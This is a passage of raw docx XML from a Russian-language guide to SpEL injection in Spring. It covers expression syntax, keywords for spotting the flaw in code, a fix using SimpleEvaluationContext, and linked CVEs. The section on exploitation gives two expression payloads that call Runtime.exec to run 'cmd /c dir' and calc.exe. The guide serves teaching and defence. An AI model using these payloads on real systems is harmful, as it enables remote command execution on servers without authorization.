          <w:color w:val="2A00FF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EB9076"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13017F">
        <w:rPr>
          <w:rStyle w:val="hl-keyword"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>byte</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[] bytes = (</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:rStyle w:val="hl-keyword"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>byte</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[]) exp.getValue();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164F7D27" w14:textId="2AE250D6" w:rsidR="0013017F" w:rsidRPr="0013017F" w:rsidRDefault="0013017F" w:rsidP="0013017F">
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SpEL</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:t xml:space="preserve"> также поддерживает вложенные свойства с использованием стандартной точечной нотации, то есть </w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>prop</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>prop</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>prop</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:t>3 и установку значений свойств.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E16808A" w14:textId="4743E568" w:rsidR="00B709E6" w:rsidRDefault="0013017F" w:rsidP="0013017F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Доступны также публичные поля.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4257FD06"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13017F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ExpressionParser parser = </w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:rStyle w:val="hl-keyword"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SpelExpressionParser();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4492A1E7"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p>
    <w:p w14:paraId="4859E2C6" w14:textId="77777777" w:rsidR="0013017F" w:rsidRPr="00337DB7"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13017F">
        <w:rPr>
          <w:rStyle w:val="hl-comment"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3F5F5F"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// invokes 'getBytes().length'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5DA730"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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Expression exp = parser.parseExpression(</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:rStyle w:val="hl-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2A00FF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'Hello World'.bytes.length</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:rStyle w:val="hl-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2A00FF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E3AD70" w14:textId="77777777" w:rsidR="0013017F" w:rsidRPr="0013017F" w:rsidRDefault="0013017F" w:rsidP="0013017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13017F">
        <w:rPr>
          <w:rStyle w:val="hl-keyword"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> length = (Integer) exp.getValue();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA6AB56" w14:textId="77777777" w:rsidR="005E30CF" w:rsidRPr="00337DB7" w:rsidRDefault="005E30CF" w:rsidP="0013017F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12C49216" w14:textId="7F1FE888" w:rsidR="0013017F" w:rsidRDefault="005E30CF" w:rsidP="0013017F">
      <w:r w:rsidRPr="005E30CF">
        <w:t>В переменную length будет записано число 11</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062897C8" w14:textId="17455141" w:rsidR="005E30CF" w:rsidRPr="005E30CF" w:rsidRDefault="005E30CF" w:rsidP="0013017F">
      <w:r w:rsidRPr="005E30CF">
        <w:lastRenderedPageBreak/>
        <w:t>Вместо строкового литерала можно вызвать конструктор String.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Тогда</w:t>
      </w:r>
      <w:r w:rsidRPr="005E30CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>строка</w:t>
      </w:r>
      <w:r w:rsidRPr="005E30CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E30CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>message</w:t>
      </w:r>
      <w:r w:rsidRPr="005E30CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>будет</w:t>
      </w:r>
      <w:r w:rsidRPr="005E30CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">хранить строку </w:t>
      </w:r>
      <w:r w:rsidRPr="005E30CF">
        <w:t>“ HELLO WORLD”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6584229E" w14:textId="77777777" w:rsidR="005E30CF" w:rsidRPr="005E30CF" w:rsidRDefault="005E30CF" w:rsidP="005E30C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5E30CF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ExpressionParser parser = </w:t>
      </w:r>
      <w:r w:rsidRPr="005E30CF">
        <w:rPr>
          <w:rStyle w:val="hl-keyword"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="005E30CF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SpelExpressionParser();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1930F984" w14:textId="77777777" w:rsidR="005E30CF" w:rsidRPr="005E30CF" w:rsidRDefault="005E30CF" w:rsidP="005E30CF">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="5" w:color="CCCCCC"/>
          <w:left w:val="single" w:sz="6" w:space="8" w:color="CCCCCC"/>
          <w:bottom w:val="single" w:sz="6" w:space="5" w:color="CCCCCC"/>
          <w:right w:val="single" w:sz="6" w:space="8" w:color="CCCCCC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:rPr>
          <w:rStyle w:val="hl-string"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="2A00FF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E30CF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Expression exp = parser.parseExpression(</w:t>
      </w:r>
      <w:r w:rsidRPr="005E30CF">
        <w:rPr>
          <w:rStyle w:val="hl-string"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="2A00FF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="005E30CF">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new String('hello world').toUpperCase()</w:t>
      </w:r>
      <w:r w:rsidRPr="005E30CF">
        <w:rPr>
          <w:rStyle w:val="hl-string"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="2A00FF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E108EF" w14:textId="77777777" w:rsidR="005E30CF" w:rsidRPr="005E30CF" w:rsidRDefault="005E30CF" w:rsidP="005E30CF">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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E30CF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>String message = exp.getValue(String.</w:t>
      </w:r>
      <w:r w:rsidRPr="005E30CF">
        <w:rPr>
          <w:rStyle w:val="hl-keyword"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="005E30CF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D10CDED" w14:textId="02207359" w:rsidR="0013017F" w:rsidRDefault="0013017F" w:rsidP="0013017F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FC26B77" w14:textId="3F233616" w:rsidR="00DD5910" w:rsidRDefault="00DD5910" w:rsidP="00AE10F2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Как ее можно обнаружить в коде и во время тестирования</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A01690" w14:textId="77777777" w:rsidR="00502044" w:rsidRDefault="00502044" w:rsidP="00502044">
      <w:r>
        <w:t>1) Если есть возможность осуществлять поиск по коду приложения, то необходимо искать такие ключевые слова: SpelExpressionParser, EvaluationContext и parseExpression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6422DD37" w14:textId="1F8E67A8" w:rsidR="00502044" w:rsidRDefault="00502044" w:rsidP="00502044">
      <w:r>
        <w:t>2) Важные для Spring указатели #{SpEL}, ${someProperty} и T(javaclass)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301F9C43" w14:textId="05BDF9C0" w:rsidR="00B4208F" w:rsidRDefault="00B4208F" w:rsidP="00B4208F">
      <w:r>
        <w:t>Выражения SpEL начинаются с символа # и заключаются в фигурные скобки:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4208F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t># \{Выражение}. На свойства можно ссылаться аналогичным образом, начиная с символа $ и заключая в фигурные скобки: $ \{property.name}.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DEAD34" w14:textId="47BA87F0" w:rsidR="00B4208F" w:rsidRDefault="00B4208F" w:rsidP="00B4208F">
      <w:r>
        <w:t>Заполнители свойств не могут содержать выражения SpEL, но выражения могут содержать ссылки на свойства:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2AA523" w14:textId="1E46D34B" w:rsidR="00B4208F" w:rsidRDefault="00B4208F" w:rsidP="00B4208F">
      <w:r w:rsidRPr="00B4208F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40130E57" wp14:editId="6AF168C7">
            <wp:extent cx="1785668" cy="2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6852" cy="259498"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FF19B2" w14:textId="34DB1979" w:rsidR="00B4208F" w:rsidRDefault="00B4208F" w:rsidP="00B4208F">
      <w:r w:rsidRPr="00B4208F">
        <w:t>В приведенном выше примере предположим, что someProperty имеет значение 2, поэтому результирующее выражение будет равно 2 + 2, что будет равно 4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546D0136" w14:textId="5B84986C" w:rsidR="00B4208F" w:rsidRPr="00FF50B5" w:rsidRDefault="00FF50B5" w:rsidP="00B4208F">
      <w:r w:rsidRPr="00FF50B5">
        <w:t>Примеры арифметических операторов</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F3AACF" w14:textId="2233121A" w:rsidR="00B4208F" w:rsidRDefault="00B4208F" w:rsidP="00B4208F">
      <w:r w:rsidRPr="00B4208F">
        <w:t>Все основные арифметические операторы поддерживаются.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4A3834" w14:textId="69CE0D29" w:rsidR="00B4208F" w:rsidRDefault="00B4208F" w:rsidP="00B4208F">
      <w:r w:rsidRPr="00B4208F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="053FA961" wp14:editId="4466ACC5">
            <wp:extent cx="3036498" cy="207325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071" cy="2103010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DBC17A" w14:textId="59A3A97D" w:rsidR="00B4208F" w:rsidRDefault="00B4208F" w:rsidP="00B4208F">
      <w:r>
        <w:t xml:space="preserve">Пример </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4208F">
        <w:t>логическ</w:t>
      </w:r>
      <w:r w:rsidR="00FF50B5">
        <w:t>их</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4208F">
        <w:t xml:space="preserve"> оператор</w:t>
      </w:r>
      <w:r>
        <w:t>ов:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A9F6F3" w14:textId="662E6934" w:rsidR="00FF50B5" w:rsidRDefault="00FF50B5" w:rsidP="00B4208F">
      <w:r w:rsidRPr="00FF50B5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A0F9767" wp14:editId="033011FB">
            <wp:extent cx="2121009" cy="514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1009" cy="514376"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D86D161" w14:textId="2134CFA1" w:rsidR="00FF50B5" w:rsidRDefault="00FF50B5" w:rsidP="00B4208F">
      <w:r w:rsidRPr="00FF50B5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="020E05EB" wp14:editId="6F05C536">
            <wp:extent cx="3289469" cy="450873"/>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9469" cy="450873"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A828C2A" w14:textId="147DC68B" w:rsidR="00B4208F" w:rsidRDefault="00FF50B5" w:rsidP="00B4208F">
      <w:r>
        <w:t xml:space="preserve">Примеры доступа </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF50B5">
        <w:t>к объектам List и Map</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AF76E2" w14:textId="08D85CF3" w:rsidR="00FF50B5" w:rsidRDefault="00FF50B5" w:rsidP="00FF50B5">
      <w:r w:rsidRPr="00FF50B5">
        <w:t>С помощью SpEL мы можем получить доступ к содержимому любого Map или List в контексте. Мы создадим новый компонент workersHolder , который будет хранить информацию о некоторых работниках и их зарплатах в List и Map :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F729776" w14:textId="645E1EE0" w:rsidR="00FF50B5" w:rsidRDefault="00FF50B5" w:rsidP="00FF50B5">
      <w:r w:rsidRPr="00FF50B5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5530943D" wp14:editId="79343EE7">
            <wp:extent cx="4156364" cy="313795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5593" cy="3144919"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D35411" w14:textId="4043E1D3" w:rsidR="00FF50B5" w:rsidRDefault="00FF50B5" w:rsidP="00FF50B5">
      <w:r w:rsidRPr="00FF50B5">
        <w:t>Теперь мы можем получить доступ к значениям коллекций, используя SpEL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F46FA1F" w14:textId="1ED28E39" w:rsidR="003D1124" w:rsidRPr="003D1124" w:rsidRDefault="00FF50B5" w:rsidP="003D1124">
      <w:r w:rsidRPr="00FF50B5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49DD98E2" wp14:editId="0605245A">
            <wp:extent cx="3918857" cy="2887579"/>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3983" cy="2891356"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A15B6B" w14:textId="1D74097C" w:rsidR="00DD5910" w:rsidRDefault="00DD5910" w:rsidP="00AE10F2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Как ее эксплуатировать</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F96FD3" w14:textId="5AEDBEFC" w:rsidR="00B821CD" w:rsidRDefault="00B821CD" w:rsidP="00B821CD">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B821CD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec("cmd /c dir").getInputStream())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC49FB6" w14:textId="77777777" w:rsidR="00B821CD" w:rsidRPr="00B821CD" w:rsidRDefault="00B821CD" w:rsidP="00B821CD">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EFDA48E" w14:textId="2C56316A" w:rsidR="00B821CD" w:rsidRPr="00B821CD" w:rsidRDefault="00B821CD" w:rsidP="00502044">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B821CD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>''.class.forName('java.lang.Runtime').getRuntime().exec('calc.exe')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393CF1A3" w14:textId="01B2836E" w:rsidR="00DD5910" w:rsidRDefault="00DD5910" w:rsidP="00AE10F2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Как ее необходимо устранить</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E12F27D" w14:textId="30CC9073" w:rsidR="00B821CD" w:rsidRPr="00B821CD" w:rsidRDefault="00502044" w:rsidP="00B821CD">
      <w:r>
        <w:t>Необходимо</w:t>
      </w:r>
      <w:r w:rsidRPr="00502044">
        <w:t xml:space="preserve"> использовать вместо полнофункционального StandardEcalutionContext более урезанный по возможностям SimpleEvaluationContext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720EC4EA" w14:textId="28F96549" w:rsidR="00DD5910" w:rsidRDefault="00DD5910" w:rsidP="00AE10F2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Примеры из открытых источников</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADD6351" w14:textId="77777777" w:rsidR="00E04BEE" w:rsidRDefault="003D1124" w:rsidP="00E04BEE">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Примеры уязвимостей </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SpEL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017FFEE0" w14:textId="77777777" w:rsidR="00E04BEE" w:rsidRDefault="00637834" w:rsidP="00E04BEE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="003D1124" w:rsidRPr="003D1124">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>cve-2018-1273</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="655573E4" w14:textId="77D502BA" w:rsidR="00E04BEE" w:rsidRPr="00E04BEE" w:rsidRDefault="00637834" w:rsidP="00E04BEE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="003D1124" w:rsidRPr="003D1124">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>cve-2017-8046</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F25E3F6" w14:textId="3CC692C5" w:rsidR="00090669" w:rsidRDefault="00637834" w:rsidP="00E04BEE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="00E04BEE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>cve-2017-4971</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
